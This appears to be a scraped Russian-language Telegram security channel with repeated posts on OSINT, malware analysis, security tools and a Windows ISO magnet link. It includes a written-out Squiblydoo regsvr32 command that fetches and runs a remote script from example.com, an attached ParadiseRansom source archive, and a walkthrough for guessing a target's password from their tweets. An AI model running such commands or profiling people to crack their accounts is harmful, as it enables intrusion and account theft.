Dargle — еще один поисковик .onion сайтов в клирнете.
Без рекламы. Имеет внушительную базу клирнет и луковых сайтов: порядка ~6400 штук.
#поисковик #сайт #Tor
Без рекламы. Имеет внушительную базу клирнет и луковых сайтов: порядка ~6400 штук.
#поисковик #сайт #Tor
MetaDefender Cloud — мощный анти-вирусный сканер файлов, ссылок, IP адресов, доменов и хешей.
Можно сочетать с этими сервисами, а так же с ботами с @VirusTotalAV_bot и @DrWebBot для комплексной проверки сомнительного файла, ссылки и т.д.
#сайт #сервис
Можно сочетать с этими сервисами, а так же с ботами с @VirusTotalAV_bot и @DrWebBot для комплексной проверки сомнительного файла, ссылки и т.д.
#сайт #сервис
#Windows 11 ISO
magnet:?xt=urn:btih:7101c26a2ba10ab2374dcc171f92a443bdc986c5&dn=21996.1.210529-1541.co_release_CLIENT_CONSUMER_x64FRE_en-us.iso
magnet:?xt=urn:btih:7101c26a2ba10ab2374dcc171f92a443bdc986c5&dn=21996.1.210529-1541.co_release_CLIENT_CONSUMER_x64FRE_en-us.iso
Реверс игры Kong: King of Atlantis (Game Boy Advance) гидрой
https://wrongbaud.github.io/posts/kong-vs-ghidra/
https://wrongbaud.github.io/posts/kong-vs-ghidra/
Wrongbaud’s Blog
Godzilla Vs. Kong Vs … Ghidra? - Ghidra Scripting, PCode Emulation, and Password Cracking
Godzilla Vs. Kong Vs … Ghidra? - Ghidra Scripting, PCode Emulation and Password Cracking
Анализ вредоносных vba макросов, с помощью конвертации их в питон скрипт
https://www.virusbulletin.com/blog/2021/04/new-article-run-your-malicious-vba-macros-anywhere/
https://www.virusbulletin.com/blog/2021/04/new-article-run-your-malicious-vba-macros-anywhere/
Virusbulletin
Virus Bulletin :: New article: Run your malicious VBA macros anywhere!
Kurt Natvig explains how he recompiled malicious VBA macro code to valid harmless Python 3.x code.
Список инструментов для malware analysis macos малвари
https://docs.google.com/document/d/1xOWmMueHHRke9aj3oRqNBgK69Y19hgZ7ehM4H9_Me-Y/mobilebasic
https://docs.google.com/document/d/1xOWmMueHHRke9aj3oRqNBgK69Y19hgZ7ehM4H9_Me-Y/mobilebasic
для детектирования криптографических алгоритмов в бинарниках
http://www.dcs.fmph.uniba.sk/zri/6.prednaska/tools/PEiD/plugins/kanal.htm
https://github.com/nihilus/IDA_Signsrch
https://github.com/marbink/signsrch_mac (спасибо Анониму, для запуска не нужна ИДА)
http://www.dcs.fmph.uniba.sk/zri/6.prednaska/tools/PEiD/plugins/kanal.htm
https://github.com/nihilus/IDA_Signsrch
https://github.com/marbink/signsrch_mac (спасибо Анониму, для запуска не нужна ИДА)
Lokibot - популярный стилер, одной из характерных черт которого является api hashing
Очень подробное описание того, что такое api hashing, на примере как раз Lokibot
https://neil-fox.github.io/Anti-analysis-using-api-hashing/
Образцы Lokibot можно найти тут
https://bazaar.abuse.ch/browse/tag/Lokibot/
Очень подробное описание того, что такое api hashing, на примере как раз Lokibot
https://neil-fox.github.io/Anti-analysis-using-api-hashing/
Образцы Lokibot можно найти тут
https://bazaar.abuse.ch/browse/tag/Lokibot/
Squiblydoo
AppLocker - фича винды (начиная с 7) позволяющая создать белый список запускаемых приложений. Приложения которые не входят в белый список, запустить нельзя. В 2016 году появился способ обхода данного ограничения, с помощью regsvr32.exe. regsvr32.exe - это легитимный виндовый бинарник регистрирующий DLL файлы в реестре. Он также является так называемым LOLBin (список лолбинов и их использование во вредоносных целях можно найти тут). regsvr32.exe позволяет также скачивать и запускать скрипты (sct) с удаленного сервера.
AppLocker - фича винды (начиная с 7) позволяющая создать белый список запускаемых приложений. Приложения которые не входят в белый список, запустить нельзя. В 2016 году появился способ обхода данного ограничения, с помощью regsvr32.exe. regsvr32.exe - это легитимный виндовый бинарник регистрирующий DLL файлы в реестре. Он также является так называемым LOLBin (список лолбинов и их использование во вредоносных целях можно найти тут). regsvr32.exe позволяет также скачивать и запускать скрипты (sct) с удаленного сервера.
regsvr32.exe /s /i:http://example.com/test.sct scrobj.dllДанная техника называется Squiblydoo. Несмотря на то, что техника стара, она все еще используется. На скрине пример вредоносного VBA макроса с довольно свежего сэмпла.
👍1
Anti_DDoS_Guardian_setup.exe
2.5 MB
#софт
Anti DDoS Guardian
Anti DDoS Guardian - это высокопроизводительное программное обеспечение для защиты от DDoS-атак для серверов Windows. Он управляет сетевыми потоками и предотвращает проникновение атакующего трафика. Защита Anti DDoS Guardian может справиться с большинством DDoS / DoS-атак, включая медленные HTTP-атаки Get & Post, атаки на приложения (уровень 7), атаки slowloris, атаки OWASP, атаки методом подбора пароля RDP
Anti DDoS Guardian
Anti DDoS Guardian - это высокопроизводительное программное обеспечение для защиты от DDoS-атак для серверов Windows. Он управляет сетевыми потоками и предотвращает проникновение атакующего трафика. Защита Anti DDoS Guardian может справиться с большинством DDoS / DoS-атак, включая медленные HTTP-атаки Get & Post, атаки на приложения (уровень 7), атаки slowloris, атаки OWASP, атаки методом подбора пароля RDP
GlassWireSetup.exe
53.9 MB
#софт
GlassWire
GlassWire - это программа безопасности и конфиденциальности, которая позволяет вам просматривать текущую и прошлую сетевую активность, а также обнаруживать вредоносные программы, шпионское ПО и другие скрытые угрозы.
GlassWire
GlassWire - это программа безопасности и конфиденциальности, которая позволяет вам просматривать текущую и прошлую сетевую активность, а также обнаруживать вредоносные программы, шпионское ПО и другие скрытые угрозы.
👍1
OSINT mindset voice chat
OSINT mindset
Запись первого эфира OSINT mindset voice chat.
Гости: Максим (Bafomet), Артём и Мефодий (MiF).
Темы:
- Деанонимизация Telegram-аккаунтов.
- Законность сбора данных парсингом сайтов и использования утечек.
- OSINT сетевой инфраструктуры;
- Популярные OSINT-инструменты и рекомендации от наших гостей.
- Использование canary-токенов и их обфускация.
Topics:
- Deanonymization of Telegram accounts.
- Legal aspects of sites scraping and use of leaks.
- OSINT of network infrastructure;
- Popular OSINT tools and recommendations from our guests.
- The use of canary tokens and their obfuscation.
Гости: Максим (Bafomet), Артём и Мефодий (MiF).
Темы:
- Деанонимизация Telegram-аккаунтов.
- Законность сбора данных парсингом сайтов и использования утечек.
- OSINT сетевой инфраструктуры;
- Популярные OSINT-инструменты и рекомендации от наших гостей.
- Использование canary-токенов и их обфускация.
Topics:
- Deanonymization of Telegram accounts.
- Legal aspects of sites scraping and use of leaks.
- OSINT of network infrastructure;
- Popular OSINT tools and recommendations from our guests.
- The use of canary tokens and their obfuscation.
👍1
Forwarded from OSINT CLUB
Orbit — это инструмент для исследования блокчейн-транзакций. Он предназначен для исследования переводов блокчейн-кошелька путем просмотра истории транзакций.
Собранные данные визуализируются в виде удобного графика.
Собранные данные визуализируются в виде удобного графика.
ParadiseRansom Source code.zip
123.7 KB
Исходные коды шифровальщика.
Исключительно в целях ознакомления и противодействия работе программ-вымогателей
Исключительно в целях ознакомления и противодействия работе программ-вымогателей
Представим ситуацию: на прикрепленном скриншоте изображен твит цели, пароль к профилю которой нам необходимо подобрать. Как это сделать?
Существует множество вариантов заполучить пароль конечного пользователя - прибегнуть к социальной инженерии и отослать фишинговое письмо, попробовать подобрать вручную, перейти к атаке по маске или воспользоваться паяльником. Но каждый из них крайне ситуативен и не всегда оправдан.
В одной из сцен «Собаки Баскервилей» Шерлок Холмс, осмотрев личные вещи жертвы, с первого раза смог угадать ее пароль. Такой же трюк мог бы пригодиться нам в настоящее время, но можем ли мы применить его в социальных сетях?
Согласно экспериментам, проведенным Карлтонским университетом и университетом Карнеги — Меллона, большинство людей придумывают пароли для учетных записей на основе личных интересов. Зачастую многие используют слова, напрямую связанные с любимыми увлечениями, работой, исповедуемой религией, видеоиграми, личными отношениями и прочими темами, которые их тревожат.
Взглянем еще раз на твит и сделаем предположения относительно пароля, согласно проведенным исследованиям: дочь цели зовут Джулия, любимый писатель цели - Джордж Оруэлл, самая известная книга которого - 1984. Объединим это все и получим «Julia1984». Это так просто?
Да, это действительно так. Анализируя утечки Ashley Madison и Myspace при помощи PACK (Password Analysis and Cracking Kit), можно также прийти к выводу, что люди склонны выбирать в качестве личного пароля существительные или имена собственные.
Использование твиттера значительно упрощает процедуру подбора - люди склонны щитпостить в него массу контента, подавляющая часть из которого - их личные переживания и интересы. В этой социальной сети также существует жесткое ограничение на количество символов, что заставляет пользователей писать более осмысленные тексты.
Похоже, что это и есть тот самый Шерлок, который вместо личных вещей роется в профилях пользователей и использует их как источник данных. Чтобы затем, объединив наиболее значимые из них, получить список всевозможных паролей.
https://github.com/utkusen/rhodiola
Существует множество вариантов заполучить пароль конечного пользователя - прибегнуть к социальной инженерии и отослать фишинговое письмо, попробовать подобрать вручную, перейти к атаке по маске или воспользоваться паяльником. Но каждый из них крайне ситуативен и не всегда оправдан.
В одной из сцен «Собаки Баскервилей» Шерлок Холмс, осмотрев личные вещи жертвы, с первого раза смог угадать ее пароль. Такой же трюк мог бы пригодиться нам в настоящее время, но можем ли мы применить его в социальных сетях?
Согласно экспериментам, проведенным Карлтонским университетом и университетом Карнеги — Меллона, большинство людей придумывают пароли для учетных записей на основе личных интересов. Зачастую многие используют слова, напрямую связанные с любимыми увлечениями, работой, исповедуемой религией, видеоиграми, личными отношениями и прочими темами, которые их тревожат.
Взглянем еще раз на твит и сделаем предположения относительно пароля, согласно проведенным исследованиям: дочь цели зовут Джулия, любимый писатель цели - Джордж Оруэлл, самая известная книга которого - 1984. Объединим это все и получим «Julia1984». Это так просто?
Да, это действительно так. Анализируя утечки Ashley Madison и Myspace при помощи PACK (Password Analysis and Cracking Kit), можно также прийти к выводу, что люди склонны выбирать в качестве личного пароля существительные или имена собственные.
Использование твиттера значительно упрощает процедуру подбора - люди склонны щитпостить в него массу контента, подавляющая часть из которого - их личные переживания и интересы. В этой социальной сети также существует жесткое ограничение на количество символов, что заставляет пользователей писать более осмысленные тексты.
Похоже, что это и есть тот самый Шерлок, который вместо личных вещей роется в профилях пользователей и использует их как источник данных. Чтобы затем, объединив наиболее значимые из них, получить список всевозможных паролей.
https://github.com/utkusen/rhodiola
👍1